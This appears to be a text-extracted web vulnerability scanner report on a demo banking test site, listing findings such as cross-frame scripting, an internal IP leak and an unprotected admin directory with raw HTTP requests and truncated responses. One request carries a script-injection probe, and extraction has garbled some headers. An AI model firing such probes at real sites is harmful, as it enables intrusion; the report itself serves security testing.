X-Scan-Memo: Category="Audit.Attack"; SID="E9A0C85302073DA2F971AC2732F2201A";
PSID="B575CF6508C02A80B46DA672DF270F32"; SessionType="AuditAttack"; CrawlType="None"; AttackType="None";
OriginatingEngineID="65cee7d3-561f-40dc-b5eb-c0b8c2383fcb"; AttackSequence="16"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="10365"; Engine="Request+Modify";
X-RequestManager-Memo: sid="43"; smi="0"; sc="1"; ID="6d629b1a-f9c1-4935-a806-1729e5cb959f";
X-Request-Memo: ID="60a641cb-d625-4f41-a37e-c6775261712e"; sc="1"; ThreadId="103";
16
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:54:31 GMT
Insecure Deployment: Unpatched Application

Page:
description
http://zero.webappsecurity.com:80/
Request:
<script>alert(097531)</script> / HTTP/1.1
Content-Length:0
Content-Length:0
Content-Length:0
Response:
HTTP/1.1 413 Request Entity Too Large
Date: Mon, 10 Oct 2016 08:09:38 GMT
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 912
...TRUNCATED...rce<br />/<br />
does not allow request data with <script>alert(097531)</script> requests, or the amount of data provided in
the r...TRUNCATED...
Cross-Frame Scripting
Page:
description
Request:
GET / HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="306E42D0F653E7CFA6720D7F15AE506B"; SessionType="ExternalAddedToCrawl";
CrawlType="None"; AttackType="None"; OriginatingEngineID="00000000-0000-0000-0000-000000000000"; ThreadId="86";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="24b6c858-ec1a-49e2-a09a-7d7c72242eb4";
X-Request-Memo: ID="a84d2393-837c-4185-b786-183812f9e186"; sc="1"; ThreadId="97";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:50:21 GMT
<!DOCTYPE html>
<html lang="en">
<head>
<title>Zero - Personal Banking - Loans - Credit Cards</title>
17

Placeholders.init({
});
</script>
}
});
</script>
</head>
<body>
<div>
<ul class="nav float-right">
<li> <form action="/search.html"
class="navbar-search pull-right" style="padding-right: 20px">
<input type="text" id="searchTerm" name="searchTerm" class="search-query" placeholder="Search"/>
</form>
</li>
<li>
<button id="signin_button" type="button" class="signin btn btn-info">
<i class="icon-signin"></i>Signin
</button>
</li>
</ul>
</div>
</div>
</div>
</div>
$(function() {
var path = "/";
$("#signin_button").click(function(event) {
event.preventDefault();
window.location.href = path + "login" + ".html";
});
});
</script>
<div class="row">
<div class="span12">
<div id="nav" class="clearfix">
<ul id="pages-nav">
<li id="homeMenu"><div><strong>Home</strong></div></li>
<li id="onlineBankingMenu"><div><strong>Online Banking</strong></div></li>
<li id="feedback"><div><strong>Feedback</strong></div></li>
</ul>
</div>
</div>
$(function () {
var path = "/";
var featureIdToName = {
18
"index": "homeMenu",
"online-banking": "onlineBankingMenu",
"feedback": "feedback"
};
if (document.location.href.match(".*" + path + "$") != null) {
$("#homeMenu").addClass("active");
} else {
$.each(featureIdToName, function(featureId, featureName) {
if (document.location.href.indexOf(featureId + ".html") >= 0) {
$("#" + featureName).addClass("active");
}
});
}
$.each(featureIdToName, function(featureId, featu
...TRUNCATED...
Low Issues
Page:
description
http://zero.webappsecurity.com:80/docs/virtual-hosting-howto.html
Request:
GET /docs/virtual-hosting-howto.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="3789B0DC3DE1119CE46D7BC7A2B69DBC";
PSID="F123B9A3291354F97AC6F79540B0A325"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="NonRooted";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="bd1a6393-365a-479d-966d-22e24f2f6476";
X-Request-Memo: ID="8e38588a-e473-42d5-b44f-cc6bfd7eea96"; sc="1"; ThreadId="97";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:30 GMT
ETag: W/"15437-1466008846000"
Last-Modified: Wed, 15 Jun 2016 16:40:46 GMT
Content-Type: text/html
...TRUNCATED.../images/asf-logo.gif" align="right" alt="Apache Logo" border="0"></a></td></tr></table><table border="0"
width="100%"...TRUNCATED...GI</a></li><li><a href="proxy-howto.html">15) Proxy Support</a></li><li><a href="mbeans
-descriptor-howto.html"...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/docs/security-howto.html
Request:
GET /docs/security-howto.html HTTP/1.1
Accept: */*
Pragma: no-cache
User-Agent:
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host:
zero.webappsecurity.com
19
X-Scan-Memo: Category="Crawl"; SID="1F194499C7D4146D9EC2FB6CA4EFA71D";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="962ff1a4-3801-4c80-89fc-8212643d4c18";
X-Request-Memo: ID="b52d7f9d-48f3-4710-be89-310ea147fa02"; sc="1"; ThreadId="100";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:34 GMT
ETag: W/"41066-1466008846000"
...TRUNCATED...g
multiple untrusted web applications, it is recommended that each web
application is deployed to a separa...TRUNCATED...tens on for connections. By default, the
connector listens on all configured IP addresses.</p>
<p>Th...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/docs/class-loader-howto.html
Request:
GET /docs/class-loader-howto.html HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="3F9DBBAE2124F08F05A08341DB70E15C";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="053e3966-f932-4d26-b649-7c3256fb9f9e";
X-Request-Memo: ID="5c28cf4c-7c3c-44cf-982e-9ebadffdae81"; sc="1"; ThreadId="97";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:14 GMT
ETag: W/"21196-1466008846000"
...TRUNCATED.../a></li><li><a href="monitoring.html">21) Monitoring and Management</a></li><li><a
href="logging.html">22) Logging</...TRUNCATED...ual Hosting</a></li><li><a href="aio.html">25) Advanced IO</a></li><
li><a href="extras.html">26) Additional Components...TRUNCATED...zed</a></li><li><a href="security-howto.html">28)
Security Considerations</a></li><li><a href="windows-service-howto.html">29) Windows
Service</a></l...TRUNCATED...uration</a></li><li><a href="api/index.html">Tomcat Javadocs</a></li><li><a
href="servletapi/index.html">Servlet...TRUNCATED...
20
href="servletapi/index.html">Servlet...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/docs/realm-howto.html
Request:
GET /docs/realm-howto.html HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="1ECABF8131D9FB74C4F25E6F3BB95533";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="1a2ace84-1955-4345-a9e8-fadc02fda9ec";
X-Request-Memo: ID="642ab42b-ae55-4a13-8cf5-90b8052483f9"; sc="1"; ThreadId="96";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:14 GMT
ETag: W/"67464-1466008846000"
...TRUNCATED...der="0" cellspacing="0" cellpadding="2"><tr><td bgcolor="#525D76"><font color="#ffffff"
face="arial,helvetica.sa...TRUNCATED...ix-like operating
systems, because access to specific web application resources is granted to
all users posses...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/docs/manager-howto.html
Request:
GET /docs/manager-howto.html HTTP/1.1
Referer: http://zero.webappsecurity.com/manager/html
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="112FD5EEB1B0EC04177727EFB7E63F42";
PSID="5691FBE4D5310DEC25DD5EB591F3E328"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="ed87c790-51f7-4bb6-9c73-d612e6966286";
X-Request-Memo: ID="fd6d5ffc-7fab-4458-b31d-4099a01505a6"; sc="1"; ThreadId="96";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:28 GMT
ETag: W/"81539-1466008846000"
Content-Type:
text/html
Content-Length:
81539
21
...TRUNCATED...><tr><td bgcolor="#828DA6"><font color="#ffffff" face="arial,helvetica.sanserif"><a name="List Available
Global JNDI "></a><a name="List_Available_Global_JNDI_Resources"><strong>List Available Global JNDI
Resources</stron...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/docs/setup.html
Request:
GET /docs/setup.html HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="78FB38A8ACEF0C9A4046CDBADE8ACEE3";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="91b98c3c-237d-473b-8586-34c28e1bfeba";
X-Request-Memo: ID="c2970dac-7f3e-47e3-a790-2df24e913f0a"; sc="1"; ThreadId="100";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:13 GMT
ETag: W/"15892-1466008846000"
...TRUNCATED...<li><a href="jspapi/index.html">JSP 2.2 Javadocs</a></li><li><a href="elapi/index.html">EL 2.2 Javadocs</
a></li><li><a href="websocketapi/index.html">WebSocket 1.1 Javadocs</a></li>...TRUNCATED...li><a
href="#Windows">Windows</a></li><li><a href="#Unix_daemon">Unix daemon</a></li></ul>
</blockquote></td></tr></table><table border="0" cellspacing="0" cellpadding="2"><tr><td
bgcolor="#525D76"><font...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/docs/security-manager-howto.html
Request:
GET /docs/security-manager-howto.html HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="7E424F7BB5A58C5B289CFF0AA76BF8D9";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="c787cd9b-10e4-436b-994a-29b9197c970a";
X-Request-Memo: ID="28cbc89a-d72e-43ae-a354-dae1fb465bc8"; sc="1"; ThreadId="99";
Response:
HTTP/1.1
Date: Mon,200
10 OK
Oct 2016 07:52:14 GMT
22
Date: Mon, 10 Oct 2016 07:52:14 GMT

ETag: W/"34024-1466008846000"
...TRUNCATED..."http://docs.oracle.com/javase/7/docs/technotes/guides/security/">
http://docs.oracle.com/javase/7/docs/tec...TRUNCATED...ess to JVM properties such as <code>java.home</code>.</li>
<li><strong>java.lang.RuntimePermission</strong> - Controls use of
some System/Runtime functions like ...TRUNCATED...ing "*" can be
used to do wild card matching for a JNDI named file resource when
granting permission. For e...TRUNCATED...va.io.FilePermission "${catalina.base}${file.separator}
// webapps${file.separator}examples${file.separato...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/docs/ssl-howto.html
Request:
GET /docs/ssl-howto.html HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="6C5A14E2FD330A1E50DE39A279EC7702";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="8b14e1f3-1e24-45b1-a860-eef9e3b561bc";
X-Request-Memo: ID="1808214a-2501-47fe-bb85-9c1c9edf6156"; sc="1"; ThreadId="98";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:14 GMT
ETag: W/"39773-1466008846000"
...TRUNCATED...3) First webapp</a></li><li><a href="deployer-howto.html">4) Deployer</a></li><li><a href="managerhowto.html">5...TRUNCATED...cessing.
This is a two-way process, meaning that both the server AND the browser encrypt
all traffic before se...TRUNCATED...-to-business (B2B) transactions than with individual
users. Most SSL-enabled web servers do not request Client...TRUNCATED...ding="2"><tr><td bgcolor="#828DA6"><font
color="#ffffff" face="arial,helvetica.sanserif"><a name="Prepare the Certificate Keystore"></a><a
name="Prepare_the_Certifica...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/docs/config/listeners.html
Request:
GET /docs/config/listeners.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/jndi-datasource-examples-howto.html
Accept: */*
Pragma: no-cache
Connection:
Keep-Alive
X-WIPP:
AscVersion=16.10.463.10
23
X-Scan-Memo: Category="Crawl"; SID="696E82F0D0DB9E2D37764BFE766D74AE";
PSID="4005A3D0BF6D3E8BFED6DB64AB0C2F8D"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="b2a89a24-3bdf-406a-8fb4-51431fde34cb";
X-Request-Memo: ID="455c0f28-12af-4d34-b488-f28ad4437f21"; sc="2"; ThreadId="97";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:53:24 GMT
ETag: W/"42468-1466008846000"
...TRUNCATED...>
<p>Entropy source used to seed the SSLEngine's PRNG. The default value
is <code>builtin</code>. ...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/docs/config/context.html
Request:
GET /docs/config/context.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/manager-howto.html
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="4C8E34E8231AA22138A4F8CA57DA7F61";
PSID="112FD5EEB1B0EC04177727EFB7E63F42"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="cfb07bb6-870f-4813-8e5b-89dcc70b8b36";
X-Request-Memo: ID="bc0b0aa9-c3d8-46be-ba39-799ba3075213"; sc="2"; ThreadId="99";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:53:07 GMT
ETag: W/"95631-1466008846000"
...TRUNCATED...ty checks, allowing JSP source code
disclosure, among other security problems.</b></p>
</td></tr><tr><td align="left" valig"><code class="attributeName">antiJARLocking</code></td><td align="left"
valign="center">
<p>If true, the Tomcat classloader will take extra measures to avoid
JAR file locking when resources are accessed inside JARs through URLs.
This will impact startup time of applications, but could prove t...TRUNCATED....</p>
</td></tr><tr><td align="left" valign="center"><code class="attributeName">antiResourceLocking</code></td><td
align="left" valer">
<p>If
true,
Tomcat will
prevent
any time
file locking.
This
will
significantly
impact
startup
of applications,
24
This will significantly impact startup time of applications,

but allows full webapp hot deploy and undeploy on platforms
or configurations where file locking can occur.
If not specified, the default value is <code>false<3 /code>.</p>
<p><code>antiJARLocking</co...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/docs/jasper-howto.html
Request:
GET /docs/jasper-howto.html HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="C33DFBBAD4C4088E60F854AC44EDE617";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="f5fad4c3-fd67-44ff-9cd8-fe03c78a5797";
X-Request-Memo: ID="4eb42312-d1aa-4164-a322-d729a5f3a7cb"; sc="1"; ThreadId="99";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:14 GMT
ETag: W/"27136-1466008846000"
...TRUNCATED...e generated files
compatible with? (Default value: <code>1.6</code>)</li>
<li><strong>development</strong> - ...TRUNCATED...ue
an error when the value of the class attribute in an useBean action is not a
valid bean class? <code>tr...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/docs/appdev/processes.html
Request:
GET /docs/appdev/processes.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/appdev/index.html
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="BFD4ECE108385B7050A05A6791AC2819";
PSID="16A0FCA95F27748B361F869AE08E40BF"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="d8415a51-6032-4553-9d5c-b56bfd9b2a36";
X-Request-Memo: ID="61ea2d41-be5e-4caf-8271-147f6154941e"; sc="1"; ThreadId="99";
Response:
HTTP/1.1
Date: Mon,200
10 OK
Oct 2016 07:53:10 GMT
25
Date: Mon, 10 Oct 2016 07:53:10 GMT

ETag: W/"21139-1466008846000"
...TRUNCATED...al. If you are using a different source code control environment, you
will need to figure out the corresponding com...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/docs/logging.html
Request:
GET /docs/logging.html HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="B03E0419F5D635D0EAC6624B1D254B23";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="4c6c0e3b-6350-4a20-9486-d19b4b40b26d";
X-Request-Memo: ID="142269d1-b4e6-4e49-bf25-f487cfb9ae2a"; sc="1"; ThreadId="96";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:29 GMT
ETag: W/"38261-1466008846000"
...TRUNCATED...umentation in the JDK for the complete details:
</p>
<div class="codeBox"><pre><code>org.apache.catalina....TRUNCATED... prefix may be added to handler names, so that mul
tiple handlers of a
single class may be instantiated. ...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/docs/monitoring.html
Request:
GET /docs/monitoring.html HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="9F4C1B8B0854C98B23B22FEFF5F16E61";
sid="35"; smi="0"; sc="1"; ID="c69bb0a8-b200-4d4b-a76a-8186f40f5309";
X-Request-Memo:
ID="6ed9ecad-77f1-4afc-bc52-ca3ee97dbdcf";
sc="1"; ThreadId="97";
26
X-Request-Memo: ID="6ed9ecad-77f1-4afc-bc52-ca3ee97dbdcf"; sc="1"; ThreadId="97";

Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:29 GMT
ETag: W/"46020-1466008846000"
...TRUNCATED...istration. Looking inside a
running server, obtaining some statistics or reconfiguring some aspects of
...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/docs/cluster-howto.html
Request:
GET /docs/cluster-howto.html HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="9099B5738BA56B5A5A2C4CBE80AD5F64";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="aa9fb7e0-1fb2-4905-9e2b-b47e24b9319f";
X-Request-Memo: ID="2a21be90-ee76-4e51-8388-670e0e99fd6f"; sc="1"; ThreadId="97";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:27 GMT
ETag: W/"49037-1466008846000"
...TRUNCATED... href="config/index.html">Configuration</a></li><li><a href="api/index.html">Tomcat J
avadocs</a></li><li><a href="servletapi/index.html">Servlet Javadocs</a></li><...TRUNCATED...ie, so your URL must look
the same from the out
side otherwise, a new session will be created.</p>
<p>Note: Clustering support currently requires the JDK vers...TRUNCATED... Remember, if you are adding your own valves or cl
uster listeners in server.xml then the defaults are no longer valid,
make sure that you add in all the appro...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/docs/building.html
Request:
GET /docs/building.html HTTP/1.1
Accept: */*
Pragma: no-cache
User-Agent:
27
X-Scan-Memo: Category="Crawl"; SID="92BF4760E2D0FDCA4ABB18FC0B743B5E";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="4fede3ba-e46c-473f-8253-ef124324ef8f";
X-Request-Memo: ID="93076e7c-a2b4-4b9a-bfb5-cd5b632a4b75"; sc="1"; ThreadId="96";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:48 GMT
ETag: W/"21672-1466008846000"
...TRUNCATED...<li><a href="elapi/index.html">EL 2.2 Javadocs</a></li><li><a href="websocketapi/index.html">WebSocket
1.1 Javado...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/docs/config/resources.html
Request:
GET /docs/config/resources.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/config/index.html
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="D8C85E6CAB767433EC2E6A7C094C1125";
PSID="7E09004C87348100F227487435CD3213"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="45855288-73af-4d6e-af8d-a51c210129d5";
X-Request-Memo: ID="5574ac61-544a-4101-8312-8660a8c925af"; sc="1"; ThreadId="96";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:53:51 GMT
ETag: W/"14649-1466008846000"
...TRUNCATED...ership</a></li><li><a href="cluster-sender.html">Channel/Sender</a></li><li><a href="clus
ter-receiver.html">Channel/Receiver</a></li><li><a href="cluster-interceptor.html">Channel/Interceptor</a></li><li><a
href="...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/docs/changelog.html
Request:
GET /docs/changelog.html HTTP/1.1
Referer:
http://zero.webappsecurity.com/docs/
Accept: */*
28
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="F3D4D3DB0835679411A7D304D23D3F25";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="d3fb0222-b563-436f-a2c5-fbbe1e8ab812";
X-Request-Memo: ID="fc2ff44c-5fb3-49d9-aa78-f04736ad5519"; sc="1"; ThreadId="97";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:48 GMT
ETag: W/"895262-1466008846000"
...TRUNCATED... may be read as the
start of the next request leading to a 400 response. (markt)
</td></tr>
</t...TRUNCATED...
<a href="http://bz.apache.org/bugzilla/show_bug.cgi?id=56717">56717</a>: Fix duplicate
registration of
...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/docs/windows-auth-howto.html
Request:
GET /docs/windows-auth-howto.html HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="FF70A74D422C22B72591B6C68DE7DBA3";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="e2085897-d964-4fb8-80e5-97e2cc35784c";
X-Request-Memo: ID="49bd3422-4472-4f1c-8766-5779e21a7e15"; sc="2"; ThreadId="97";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:43 GMT
ETag: W/"27921-1466008846000"
...TRUNCATED...l trusted
intranet.</li>
29
intranet.</li>
<li>The SPN must be HTTP/<hostname> and it must be exactly the same in all
the places i...TRUNCATED...

Page:
description
http://zero.webappsecurity.com:80/docs/ssi-howto.html
Request:
GET /docs/ssi-howto.html HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="CB04B081478DF74AFDD0F66123F0F73B";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="cdb81246-bfb8-4cf3-90bd-7ef6737b4bff";
X-Request-Memo: ID="7ed138d2-5ac8-481d-a34c-d0e719a44700"; sc="1"; ThreadId="96";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:14 GMT
ETag: W/"21189-1466008846000"
...TRUNCATED... The server's IP address.</td>
</tr>
<tr>
<td>SERVER_NAME</td>
<td>
The server's hostname or IP address.</td>
</tr>
<tr>
<td>SERVER_PORT</td>
<td>
The port on which the server receiv...TRUNCATED...
System Information Leak: Internal IP

Page:
description
http://zero.webappsecurity.com:80/errors/errors.log
Request:
GET /errors/errors.log HTTP/1.1
Referer: http://zero.webappsecurity.com/errors/
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="C32128A8498A56E4E6435B6994687E3A";
PSID="BB23AC8A7B9C89C3DE9576C0FEACCA3F"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
sid="35"; smi="0"; sc="1"; ID="903a6949-6ac8-489d-8c93-bb0ff0a74979";
X-Request-Memo:
ID="7fb39035-d4ae-41aa-a0e7-7b0907724343";
sc="1"; ThreadId="97";
30
X-Request-Memo: ID="7fb39035-d4ae-41aa-a0e7-7b0907724343"; sc="1"; ThreadId="97";

Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:28 GMT
ETag: W/"21684-1368929102000"
Tue Jan 22 09:11:32 EST 2013 [ERROR] [local 10.5.157.10]
[com.zero.bank.auth.UserAuthenticator.authentica...TRUNCATED...nc].
[com.zero.bank.auth.UserAuthenticator.authentica...TRUNCATED...ec].
[com.zero.bank.auth.UserAuthenticator.authentica...TRUNCATED...et].
[com.zero.bank.auth.UserAuthenticator.authentica...TRUNCATED...us].
[com.zero.bank.auth.UserAuthenticator.authentica...TRUNCATED...bi].
[com.zero.bank.auth.UserAuthenticator.authentica...TRUNCATED...u.].
[com.zero.bank.auth.UserAuthenticator.authentica...TRUNCATED...n,].
[com.zero.bank.auth.UserAuthenticator.authentica...TRUNCATED...nt].
[com.zero.bank.auth.UserAuthenticator.authentica...TRUNCATED...ae].
Tue Jan 22 18:57:25 EST 2013 [ERROR] [local 10.5.157.10] [com.zero.bank.auth.UserAuthenticator.authentica...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/docs/monitoring.html
Request:
GET /docs/monitoring.html HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="9F4C1B8B0854C98B23B22FEFF5F16E61";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="c69bb0a8-b200-4d4b-a76a-8186f40f5309";
X-Request-Memo: ID="6ed9ecad-77f1-4afc-bc52-ca3ee97dbdcf"; sc="1"; ThreadId="97";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:29 GMT
ETag: W/"46020-1466008846000"
...TRUNCATED...<property
name="cluster.server.address" value="192.168.1.75" />
<property name="cluster.server.port"...TRUNCATED...ina:type=IDataSender,host=localhost,senderAddress=192.168.111.1
31
<property name="cluster.server.port"...TRUNCATED...ina:type=IDataSender,host=localhost,senderAddress=192.168.111.1
,senderPort=9025"
attribute="connected"
...TRUNCATED...ina:type=IDataSender,host=localhost,senderAddress=192.168.111.1,senderPort=9025"
attribute="connected"
...TRUNCATED...
Page:
Request:
Accept: */*
Pragma: no-cache
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:38 GMT
ETag: W/"504686-1368929102000"
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburnepo\root\oad\incoming\lorenzo\boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn repo\root\oad\incoming\lorenzo\boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --...TRUNCATED...\root\oad\incoming\lorenzo\boston
blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> surepo\root\oad\incoming\lorenzo\boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> ...TRUNCATED...po\root\oad\incoming\lorenzo\boston
choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> ...TRUNCATED...po\root\oad\incoming\lorenzo\boston
concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sun_repo\root\oad\incoming\lorenzo\boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> surepo\root\oad\incoming\lorenzo\boston water5.jpg
cf310.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC C:\old_repo\root\oad\boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn C:\ol...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/docs/config/filter.html
Request:
GET /docs/config/filter.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/security-howto.html
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="46494C4CFCA02171D7106D528B555498";
PSID="1F194499C7D4146D9EC2FB6CA4EFA71D"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="133118b0-4eff-49e5-b4ad-6236be637206";
32
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="133118b0-4eff-49e5-b4ad-6236be637206";

X-Request-Memo: ID="60f43f76-a3b1-4fe5-8cdc-73366ecbed84"; sc="2"; ThreadId="99";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:53:49 GMT
ETag: W/"107756-1466008846000"
...TRUNCATED...
<td> request.remoteAddr </td>
<td> 192.168.0.10 </td>
<td> 140.211.11.130 </td>
<...TRUNCATED...code>]</code> </td>
<td> 140.211.11.130, 192.168.0.10 </td>
<td> null </td>
</tr>
...TRUNCATED...
<td> 192.168.0.10 </td>
<td> 140.211.11.130 </td>
<...TRUNCATED...
<td> 192.168.0.10 </td>
<td> 140.211.11.130 </td>
<...TRUNCATED...td>
<td> 140.211.11.130, proxy1, proxy2, 192.168.0.10 </td>
<td> null </td>
</tr>
...TRUNCATED...
<code>x-forwarded-by</code> header. As <code>192.168.0.10</code> is an internal
proxy, it does not app...TRUNCATED...
<td> 192.168.0.10 </td>
<td> untrusted-proxy </td>
...TRUNCATED...
Web Server Misconfiguration: Unprotected Directory

Page:
description
http://zero.webappsecurity.com:80/manager/html
Request:
GET /manager/html HTTP/1.1
Referer: http://zero.webappsecurity.com:80/manager/
Accept: */*
Pragma: no-cache
X-RequestManager-Memo: Category="StateRequestor.Redirect"; TriggerID="ef3f998d-8124-4e90-b4b3-f9a91d1f6a3b"; sid="53";
smi="0"; sc="1"; ID="7a2b8d86-2551-4b54-8b44-9c6cf1856fd3";
X-Request-Memo: ID="a8959cac-20d1-40af-889e-9553f5e18bee"; sc="1"; ThreadId="108";
Response:
HTTP/1.1 401 Unauthorized
Date: Mon, 10 Oct 2016 07:51:12 GMT...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/admin/
Request:
GET /admin/ HTTP/1.1
Accept: */*
Pragma: no-cachegzip, deflate
Accept-Encoding:
33

X-Scan-Memo: Category="Audit.Attack"; SID="B09C4D5CC22F10C01D9D84418780B93D";
X-RequestManager-Memo: sid="39"; smi="0"; sc="1"; ID="44b684c9-a38e-482f-b7ae-2cf445d55017";
